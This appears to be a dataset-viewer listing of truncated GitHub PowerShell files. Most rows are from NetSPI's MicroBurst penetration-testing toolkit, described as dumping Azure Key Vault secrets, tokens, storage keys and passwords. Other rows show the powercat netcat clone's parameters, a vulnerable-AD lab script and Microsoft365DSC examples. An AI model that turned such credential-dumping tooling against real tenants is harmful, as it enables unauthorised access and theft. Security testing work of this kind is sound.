Author: Karl Fosaaen (@kfosaaen), NetSPI - 2025
Description: PowerShell functions for dumping Key Vault Credentials and Managed Identity tokens from Azure Load Testing resources
#>
function Get-AzLoadTestingData{
<#
.SYNOPSIS
PowerShell function for dumping ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzACRTokenGenerator.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 16,059 | <#
File: Invoke-AzACRTokenGenerator.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2023
Description: PowerShell function for dumping Azure Managed Identity tokens, using ACR Tasks.
#>
Function Invoke-AzACRTokenGenerator
{
<#
.SYNOPSIS
Dumps access tokens for any Azure Container Registries wi... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzHybridWorkerExtraction.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 12,181 | <#
File: Invoke-AzHybridWorkerExtraction.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2023
Description: PowerShell function for dumping Azure Automation Account Certificates from Hybrid Worker VMs using the Az PowerShell CMDlets.
Potential Improvements:
- Correct for multiple PFX files retur... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | MSOL/Get-MSOLDomainInfo.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 5,704 | <#
File: Get-MSOLDomainInfo.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2018
Description: PowerShell functions for enumerating information from Office365 domains.
#>
# Check if the MSOnline Module is installed and imported
if(!(Get-Module MSOnline)){
try{Import-Module MSOnline -ErrorAction Stop}
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | MSOL/MicroBurst-MSOL.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 178 |
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
Import-Module $_.FullName
}
Write-Host "Imported MSOnline MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/MicroBurst-AzureREST.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 184 |
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
Import-Module $_.FullName
}
Write-Host "Imported Azure REST API MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AZStorageKeysREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 4,137 | Function Get-AzStorageKeysREST
{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from an Azure Bearer token.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the SubscriptionId and token parameters ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AzKeyVaultKeysREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 5,508 | Function Get-AzKeyVaultKeysREST
{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available Key Vault Keys using Azure Bearer tokens and the REST APIs.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the SubscriptionId and token... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AzRestBastionShareableLink.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 1,591 | function Get-AzRestBastionShareableLink {
# Author: Karim El-Melhaoui(@KarimsCloud), O3 Cyber
# Description: PowerShell function for getting an existing shareable link in Azure Bastion
# https://learn.microsoft.com/en-us/azure/bastion/shareable-link
$AccessToken = Get-AzAccessToken
if ($AccessTok... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AzKeyVaultSecretsREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 6,667 | Function Get-AzKeyVaultSecretsREST
{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available Key Vault Secrets using Azure Bearer tokens and the REST APIs.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the SubscriptionId and... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Invoke-AzElevatedAccessToggle.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 1,436 | Function Invoke-AzElevatedAccessToggle {
# Author: Karim El-Melhaoui(@KarimMelhaoui), O3 Cyber
# Description: PowerShell function for invoking Elevated Access Toggle
# https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin
# https://microsoft.github.io/Azure-Thre... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Invoke-AzRESTBastionShareableLink.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 2,802 | function Invoke-AzRestBastionShareableLink {
# Author: Karim El-Melhaoui(@KarimsCloud), O3 Cyber
# Description: PowerShell function for creating a shareable link in Azure Bastion
# A VM must be specified as the link is attached to a VM.
# https://learn.microsoft.com/en-us/azure/bastion/shareable-link
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AzAutomationAccountCredsREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 20,810 | Function Get-AzAutomationAccountCredsREST {
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
HelpMessage="Subscription ID")]
[string]$SubscriptionId,
[Parameter(Mandatory=$false,
HelpMessage="The management scoped token")]
[string]$managementToken,
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Get-AzDomainInfoREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 23,246 | #Offload nextLink parsing to a separate function to avoid bloat
Function Get-RESTReq {
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true,
HelpMessage="The management scoped token")]
[string]$managementToken,
[Parameter(Mandatory=$true)]
[string]$resourceURI
)
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | REST/Invoke-AzVMCommandREST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 5,743 | <#
File: Invoke-AzVMCommandREST.ps1
Original Author: @passthehashbrowns
Updated Version Author: Karl Fosaaen (@kfosaaen), NetSPI - 2023
Description: PowerShell functions for running commands on VMs (Linux and Windows) via the VM Run Command APIs.
2023 Updates - Now supports multiple subscriptions ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureRM/Get-AzureKeyVaults-Automation.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 12,241 | <#
File: Get-AzureKeyVaults-Automation.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2019
Description: PowerShell function for dumping Azure Key Vault Keys and Secrets via Automation Accounts.
#>
# Check if the AzureRM Module is installed and imported
if(!(Get-Module AzureRM)){
try{Import-Module Azu... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureRM/Invoke-AzureRmVMBulkCMD.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 7,390 | <#
File: Invoke-AzureRmVMBulkCMD.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2018
Description: PowerShell function for running PowerShell scripts against multiple Azure VMs.
#>
# Check if the AzureRM Module is installed and imported
if(!(Get-Module AzureRM)){
try{Import-Module AzureRM -ErrorAction... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureRM/MicroBurst-AzureRM.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 177 |
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
Import-Module $_.FullName
}
Write-Host "Imported AzureRM MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureRM/Get-AzurePasswords.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 22,354 | <#
File: Get-AzurePasswords.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2019
Description: PowerShell function for dumping Azure credentials.
#>
# Check if the AzureRM Module is installed and imported
if(!(Get-Module AzureRM)){
try{Import-Module AzureRM -ErrorAction Stop}
catch{Install-Module -... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureRM/Get-AzureDomainInfo.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 33,037 | <#
File: Get-AzureDomainInfo.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2018
Description: PowerShell functions for enumerating information from Azure domains.
#>
# To Do:
# Add Ctrl-C handling for skipping sections/storage accounts
# Higher level metrics reporting (X% of your domain users ... |
github | besimorhino/powercat | https://github.com/besimorhino/powercat | powercat.ps1 | PowerShell | apache-2.0 | 2,360 | master | 37,667 | function powercat
{
param(
[alias("Client")][string]$c="",
[alias("Listen")][switch]$l=$False,
[alias("Port")][Parameter(Position=-1)][string]$p="",
[alias("Execute")][string]$e="",
[alias("ExecutePowershell")][switch]$ep=$False,
[alias("Relay")][string]$r="",
[alias("UDP")][switch]$u=$Fal... |
github | safebuffer/vulnerable-AD | https://github.com/safebuffer/vulnerable-AD | vulnad.ps1 | PowerShell | mit | 2,280 | master | 65,052 | #Base Lists
$Global:HumansNames = @('Aaren', 'Aarika', 'Abagael', 'Abagail', 'Abbe', 'Abbey', 'Abbi', 'Abbie', 'Abby', 'Abbye', 'Abigael', 'Abigail', 'Abigale', 'Abra', 'Ada', 'Adah', 'Adaline', 'Adan', 'Adara', 'Adda', 'Addi', 'Addia', 'Addie', 'Addy', 'Adel', 'Adela', 'Adelaida', 'Adelaide', 'Adele', 'Adelheid', 'Ad... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOOwaMailboxPolicy/3-Remove.ps1 | PowerShell | mit | 2,267 | Dev | 840 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOOwaMailboxPolicy/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 8,376 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOOwaMailboxPolicy/1-Create.ps1 | PowerShell | mit | 2,267 | Dev | 8,356 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/IntuneDeviceCompliancePolicyMacOS/1-Create.ps1 | PowerShell | mit | 2,267 | Dev | 1,977 | <#
This example creates a new Device Comliance Policy for MacOS.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$TenantId,
[Parameter()]
[System.String]
$CertificateThumbprint
... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/IntuneDeviceCompliancePolicyMacOS/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 1,996 | <#
This example creates a new Device Comliance Policy for MacOS.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$TenantId,
[Parameter()]
[System.String]
$CertificateThumbprint
... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/IntuneDeviceCompliancePolicyMacOS/3-Remove.ps1 | PowerShell | mit | 2,267 | Dev | 813 | <#
This example creates a new Device Comliance Policy for MacOS.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$TenantId,
[Parameter()]
[System.String]
$CertificateThumbprint
... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/AADExternalIdentityPolicy/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 901 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOSecOpsOverrideRule/3-Remove.ps1 | PowerShell | mit | 2,267 | Dev | 764 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOSecOpsOverrideRule/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 1,183 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/EXOSecOpsOverrideRule/1-Create.ps1 | PowerShell | mit | 2,267 | Dev | 890 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/AADAdminConsentRequestPolicy/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 1,751 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
github | Microsoft365DSC/Microsoft365DSC | https://github.com/Microsoft365DSC/Microsoft365DSC | Examples/Resources/AADConditionalAccessPolicy/2-Update.ps1 | PowerShell | mit | 2,267 | Dev | 1,855 | <#
This example is used to test new resources and showcase the usage of new resources being worked on.
It is not meant to use as a production baseline.
#>
Configuration Example
{
param(
[Parameter()]
[System.String]
$ApplicationId,
[Parameter()]
[System.String]
$Ten... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.